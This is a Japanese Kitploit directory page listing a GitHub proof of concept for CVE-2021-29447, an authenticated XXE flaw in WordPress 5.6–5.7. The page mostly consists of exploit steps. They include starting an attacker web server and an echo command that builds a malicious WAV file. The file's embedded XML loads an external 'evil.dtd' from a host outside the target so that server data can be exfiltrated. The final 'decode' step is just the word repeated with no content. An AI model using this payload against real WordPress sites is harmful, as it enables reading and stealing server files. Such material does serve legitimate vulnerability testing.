Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-29447 — WordPress - 認証済みXXE (CVE-2021-29447) | Kitploit
ツール/GitHubGitHub/motikan2010/cve-2021-29447
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubmotikan2010/cve-2021-29447

CVE-2021-29447

WordPress - 認証済みXXE (CVE-2021-29447)

リポジトリを見る
43114年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WordPress 5.6-5.7 - 認証済み (Author+) XXE (CVE-2021-29447)

使用方法

ステップ1. WordPressを起動

root@kitploit:~
$ make up-wp

ステップ2. 攻撃者用Webサーバーを起動

root@kitploit:~
$ make up-mal

ステップ3. 悪意のあるWAVファイルを生成

wavefile npmを使わない場合 (推奨)

root@kitploit:~
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

wavefile npmを使う場合

root@kitploit:~
$ make make-wav

ステップ4. WordPressにログインし、WAVファイルを新しいメディアにアップロード

ステップ5. デコード

デコード
デコード
デコード

参考文献

  • WordPress 5.6-5.7 - PHP 8に影響するメディアライブラリ内の認証済みXXEセキュリティ脆弱性
ツールをダウンロード